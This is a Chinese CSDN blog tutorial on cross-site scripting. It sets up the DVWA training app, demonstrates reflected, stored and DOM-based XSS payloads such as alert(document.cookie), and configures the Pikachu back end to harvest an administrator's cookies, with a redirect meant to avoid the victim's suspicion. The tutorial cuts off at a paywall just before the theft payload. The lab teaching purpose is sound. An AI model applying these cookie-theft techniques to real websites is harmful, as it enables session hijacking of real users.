XSS跨站脚本攻击

最新推荐文章于 2024-09-25 11:20:57 发布
最新推荐文章于 2024-09-25 11:20:57 发布
阅读量4.1k 收藏 3
点赞数 2
分类专栏: Web安全 文章标签: xss web安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SYJ_361/article/details/122111796
版权
本文详细介绍了XSS跨站脚本攻击的原理、类型(反射型、存储型、DOM型)及其危害,提供了环境搭建教程。通过实例演示了如何利用XSS攻击窃取用户cookie,并展示了在DVWA不同安全级别下的XSS利用。此外,文章还讨论了XSS攻击的应用,包括劫持用户浏览器、钓鱼窃取用户信息,并分享了XSS防御方法,如输入验证、输出编码等。
摘要由CSDN通过智能技术生成

XSS跨站脚本攻击

文章目录

0x01:XSS原理

  • 跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。

  • 恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

    • XSS攻击针对的是用户层面的攻击!

XSS的类型

反射型XSS

  • 反射型 XSS,非持久化,需要欺骗用户自己去点击链接才能触发 XSS 代码。

  • 反射型 xss 攻击的方法,攻击者通过发送邮件或诱导等方法,将包含有 xss 恶意链接发送给目标用户

  • 当目标用户访问该链接时,服务器将接收该用户的请求并进行处理,

  • 然后服务器把带有 xss 恶意脚本发送给目标用户的浏览器,浏览器解析这段带有 xss 代码的恶意脚本后,就会触发 xss 攻击。

存储型XSS:
  • 存储型 XSS,持久化,代码是存储在服务器中的数据库里,
    • 如在个人信息或发表文章等地方,可以插入代码,
    • 如果插入的数据没有过滤或过滤不严,
    • 那么这些恶意代码没有经过过滤将储存到数据库中,用户访问该页面的时候,没有进行编码过滤输出到浏览器上,就会触发代码执行,造成 xss 攻击。
DOM型XSS:

  • DOM,全称 Document Object Model。

  • DOM 型 XSS

    • 是一种特殊类型的反射型 XSS,
    • 它是基于 DOM 文档对象模型的一种漏洞。
    • 可以通过 JS 脚本对文档对象进行编辑从而修改页面的元素。
    • 也就是说,客户端的脚本程序可以通过

  • DOM 来动态修改页面内容,

    • 从客户端获取 DOM 中的数据并在本地执行,
    • 而不需要与服务器交互,
    • 它只发生在客户端处理数据阶段。

危害:存储型XSS>反射型XSS>DOM型XSS

环境搭建

  • DVWA(Damn Vulnerable Web App)是一个基于PHP/MySql搭建的Web应用程序,
  • 旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,
  • 帮助Web开发者更好的理解Web应用安全防范的过程。

1.上传 DVWA 到 我们的centos 主机

  • 把文件直接拖到 /var/www/html 目录下面

  • 然后把文件夹的名字改短一点

    cd /var/www/html
unzip DVWA-master.zip #解压缩
mv DVWA-master DVWA  #把名字改短一些

    image-20211223092456196

2.编辑 DVAW 数据库配置文件

生成新的配置文件 config.inc.php

cd DVWA/config #切换目录
cp config.inc.php.dist config.inc.php  ##基于模版配置文件,生成新的配置文件 config.inc.php
vim config.inc.php  #打开新生成的文件

修改配置

21行
$_DVWA[ 'db_user' ] = 'root'; #需要修改成你的 mysql 的 用户名
$_DVWA[ 'db_password' ] = 'kali'; #需要修改成你的 mysql 的密码

#27 28行 加上谷歌开源免费验证码 reCAPTCHA 的公钥和私钥
$_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';

保存

esc #结束编辑
:wq #保存设置

image-20211223092759136

3.修改文件权限

 chown -R apache:apache /var/www/html

4.部署DVWA网站

物理机打开网址:

http://192.168.81.135/DVWA/setup.php  #把IP地址换成自己的centos的IP地址

  • 点击 create 即可创建完成

  • 等待10秒即可返回登陆页面

image-20211223093132024

登陆网站:

账户密码

Username:admin
Password:password

image-20211223093252646

安全级别说明
  1. Low(低) -
    • 此安全级别完全容易受到攻击,并且根本没有安全措施
    • 它的用途是作为Web应用程序漏洞
    • 如何通过不良编码实践表现出来的示例,
    • 并作为教授或学习基本利用技术的平台。
  2. Medium(中) -
    • 此设置主要是为了给用户一个不良安全实践的例子
    • 其中开发人员尝试但未能保护应用程序。
    • 它还对用户提出了改进其利用技术的挑战。
  3. High(高) -
    • 此选项是对中等难度的扩展,
    • 混合了较难或替代的不良做法来尝试保护代码。
    • 该漏洞可能不允许相同程度的利用,这在各种(CTF) 竞赛中类似。
  4. Impossible(不可能) -
    • 此级别应针对所有漏洞安全
    • 它用于将易受攻击的源代码与安全源代码进行比较

XSS DVWA Low级别

将安全级别改为Low

image-20211223094010374

0x02:反射型 XSS

  • 这个功能类似一个留言板,
  • 输入信息后下面会增加对应的信息

image-20211223094320423

获取cookie

我们添加一条 JavaScript 代码获取 cookie

在文本框中输入下列代码

#我们添加一条 JavaScript 代码获取 cookie

<script>alert(document.cookie);</script>

  • alert() 函数:弹出警告框

  • document.cookie 显示cookie信息

image-20211223094646818

查看源代码

image-20211223094832894

  • 根据回显信息判断出,显示的文本内容是 Hello $name。

  • 我们输入的信息被存放在$name 变量中。

这里我们弹的是cookie,还可以是其他的内容。

和sql注入有一点相似,就是攻击者可以构造恶意的代码。

<script>alert("你被黑了")</script> 
#弹出【你被黑了】

image-20211223095037717

<script>alert(/hack/)</script>   
#弹出hack

image-20211223095113310

<script>alert(1)</script>        
#弹出1,对于数字可以不用引号

image-20211223095158859

补充
什么是 Cookie?

Cookie 用于存储 web 页面的用户信息。

当 web 服务器向浏览器发送 web 页面时,在连接关闭后,服务端不会记录用户的信息。

Cookie 的作用就是用于解决 “如何记录客户端的用户信息”:

  • 当用户访问 web 页面时,他的名字可以记录在 cookie 中。
  • 在用户下一次访问该页面时,可以在 cookie 中读取用户访问记录。

0x03:存储型XSS

存储型 XSS 和反射型 XSS 的区别
  • 反射型XSS 只会弹一次 cookie 信息。
  • 存储型 XSS 每次访问这个页面都是会弹出 cookie 信息。
  • 因为 存储型XSS 代码已经嵌入在了该 Web 站点当中,所以每次访问都会被执行。
获取cookie
<script>alert(document.cookie);</script>

image-20211223095950952

image-20211223100321799

image-20211223100353777

image-20211223100458344

任意输入名字和消息进行查看

image-20211223100820742

image-20211223100620063

image-20211223100657069

查看源码

我们按F12查看源码 :

image-20211223101226909

数据库中查看:

使用dvwa数据库

 show databases; 
 use dvwa;  
 show tables;
 select * from guestbook;

image-20211223101510742

image-20211223101916199

  • 可以看到我门提交的数据被存放在数据库当中。
  • 每次用户访问页面时 Web 程序会从数据库中读取出
  • XSS 攻击代码,从而被重复利用。

0x04:DOM型XSS

  • DOM,全称 Document Object Model。
  • DOM 型 XSS
    • 其实是一种特殊类型的反射型 XSS,
    • 它是基于 DOM 文档对象模型的一种漏洞。
  • 可以通过 JS 脚本对文档对象进行编辑从而修改页面的元素。
    • 也就是说,客户端的脚本程序可以通过
  • DOM 来动态修改页面内容,
    • 从客户端获取 DOM 中的数据并在本地执行,
    • 而不需要与服务器交互,
    • 它只发生在客户端处理数据阶段。

基于DVWA XSS(DOM)

构造XSS代码:
<script>alert("xss")</script>

完整的代码:

http://192.168.81.135/DVWA/vulnerabilities/xss_d/?default=<script>alert("xss")</script>

image-20211223102513895

选择English之后,网页地址变化

image-20211223102610769

  • 我们把地址栏的English改为我们的构造XSS代码,
  • 然后Enter(回车)后查看结果
<script>alert("xss")</script>

image-20211223102922888

按F12查看源码

可以看到,我们的脚本插入到代码中,修改了网页显示的内容

image-20211223103213021

0x05:使用Pikachu Xss窃取管理员的cookie

攻击拓扑图:

image-20211223103330960

1.环境准备:

  • 先登录DVWA

    • 管理员账户:admin

    • 密码:password

  • 打开pikachu平台

    • 找到我们要利用的模块:
    • pikachu----【管理工具】–【XSS后台】

image-20211223103547982

登录

image-20211223103831134

选中【cookie搜集】

image-20211223103912927

image-20211223104026539

2.修改代码:
cd /var/www/html/pikachu/pkxss/xcookie  #切换到cookie相关的目录
vim cookie.php

image-20211223104317344

  • 把图上黄框那一行里面的网址修改为一个可信的网站:
    • 这里的意思是当用户点击后
    • 向我们的XSS平台写入cookie后
    • 再跳转回原来的页面

这里我们跳转到原来的那个页面

header("Location:http://192.168.81.135/DVWA/vulnerabilities/xss_r/"); #跳转原来的页面,这里IP改为centos的IP地址
注意:

如果没有这一步 用户点击我们的链接后会一直停留在我们的黑客服务器的页面上,从而引起用户怀疑

3.构造payload:
<script>document.location='
最低0.47元/天 解锁文章
小小西贝
关注
专栏目录
Kali渗透测试之DVWA系列4——反射型XSS(跨站脚本攻击)
浅浅的博客
05-11 4236
目录 一、XSS 1、XSS简介 2、XSS类型 3、漏洞形成的根源 二、反射型XSS 1、原理示意图​ 2、实验环境 3、实验步骤 安全级别:LOW 重定向 获取cookie 安全级...
Kali Linux-网络安全之-XSS 跨站脚本攻击原理及 DVWA 靶机的搭建
xueshenlaila的博客
12-31 1385
XSS 跨站脚本攻击 使用 JavaScript 创建 Cookie JavaScript 可以使用 document.cookie 属性来创建 、读叏、及删除 cookie。 例 1:JavaScript 中,创建 cookie 如下所示: document.cookie=“username=John Doe”; 例 2:你还可以为 cookie 添加一个过期时间(以 UTC 戒 GMT 时间)。默认情况下,cookie 在 浏览器关闭时删除: document.cookie=“username=John
跨站脚本攻击XSS演示(burpsuite)
qq_45070118的博客
07-31 3771
XSS简介 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的 通过web站点漏洞,向客户端交付恶意脚本代码,实现对客户端的攻击,事...
Kali渗透测试之DVWA系列5——存储型XSS(跨站脚本攻击)
浅浅的博客
05-11 2920
目录 一、原理示意图 二、实验环境 三、实验步骤 安全级别:LOW 重定向 获取cookie 安全级别:Medium 安全级别:High 安全级别:Impossible 存储型XSS 长期存储于服务器端 每次用户访问都会被执行javascript脚本 了解XSS简...
XSS 跨站脚本攻击
猫老板的豆
06-04 674
简介 Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。 攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如 Cookie、SessionID 等,进而危害数据安全XSS 的本质是:恶意代码未经过滤,与网站正常的代码混在一起;浏览器无法分辨哪些脚本是可信的,导致恶意脚本被执行。 而由于直接在用户的终端执行,恶意代码能够直接获取用户的信息,或者利用这些信息冒充用户向网站发起攻击者定义的请求。 在处理输入时,以
XSS跨站脚本攻击及防护
weixin_62707591的博客
06-18 3281
XSS又叫CSS),即跨站脚本攻击,是最常见的 Web 应用程序安全漏洞之一。在绝大多数网络攻击中都是把XSS作为漏洞链中的第一环,通过XSS,黑客可以得到的最直接利益就是拿到用户浏览器的 cookie,从而变相盗取用户的账号密码,进而非授权的获取关键的隐私信息。XSS攻击是一种客户端访问嵌入有恶意脚本代码的Web页面,从而盗取信息、利用身份等的一种攻击行为。XSS属于客户端攻击受害者最终是用户。XSS的传播性极强,由于 web 的特点是轻量级灵活性高。
Xss跨站脚本攻击
qq_52108058的博客
11-12 1068
因为XSS Payload的强大,也是为了使用的方便,有安全研究者将许多功能封装了起来做成了XSS平台。也是因为插入点一般都有长度限制,所以说xss一般攻击都需要外链。跨站脚本攻击,是代码注入的一种,它允许恶意用户将代码注入网页,其他用户在浏览网页时就会受到影响。这里我们用http://xsscom.com/来演示。第二个是原本程序要执行的代码,拼接了用户输入的数据。目的是每隔一段时间访问网站,是否获取到cookie。,为了快速测试我们在所以输入框中都插入。提交后我们发现,在主题处是存在漏洞的。
xss跨站脚本攻击总结
太阳照耀我走四方
07-16 2159
svg onload="alert(1)"> //onerror 当加载文档或图像时发生某个错误无的弹窗语句onclick="alert(1)" //鼠标单击事件onmouseover="alert(1)" //鼠标悬浮事件最后还有很多的绕过姿势,推荐博客cookie:存储本地 存活时间较长 小中型session: 会话 存储服务器 存活时间较短 大型企业使用。
09.XSS跨站脚本攻击(超详细!!!)
m0_72760503的博客
08-02 1182
http : // www. oldboyedu.com :80 / news/index.php 协议 子域名 主域名 端口 资源地址当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域。我们把不同的域之间请求数据的操作,成为跨域操作。
XSS跨站脚本攻击剖析与防御.pdf
05-16
XSS跨站脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击知识点总结 xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结:...
XSS跨站脚本攻击剖析与防御
04-28
XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
网络安全 DVWA通关指南 DVWA Stored Cross Site Scripting (存储型 XSS)
YueXuan_521的博客
09-19 977
网络安全 DVWA通关指南 DVWA Stored Cross Site Scripting (存储型 XSS)
网络安全证书考取相关知识
aa98865646的博客
09-21 614
作者是个想进入网络安全行业发展的小白,目前没啥钱,是想自学以后挖漏洞赚钱的,看了这两个算是比较常见的证书看起来都要花不少钱的话,我感觉自己还是先自学一段时间再说吧,实战更重要,这些证书等以后有机会慢慢考吧,如果需要的话。欢迎大佬补充其他适合小白考取的证书,目前感觉4800+480的NISP一级证书比较适合在学校的小白,CISP的话再NISP考到二级以后再加钱4000就可以换成CISP了,NISP适合学生,CISP适合职场啊,不过都是要钱啊。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-24 618
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全:腾讯云智、绿盟、美团、联想的面经
persist213的博客
09-21 1476
网安面试指南》《Java代码审计》《Web安全》我从4月份找到现在一共面了四家公司,来和大家分享一下我的面试经历(本文来自一位朋友的面试经历)。
网络安全全方略
最新发布
AI逍遥子
09-25 1069
网络安全全方略是一个系统化、全面化的过程,涉及策略制定、技术实施、管理流程、技术维护和文化建设等多个方面。通过构建一个全方位、多层次的网络安全防护体系,可以有效保护网络系统、数据和服务免受各种威胁,保业务的连续性和数据的完整性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值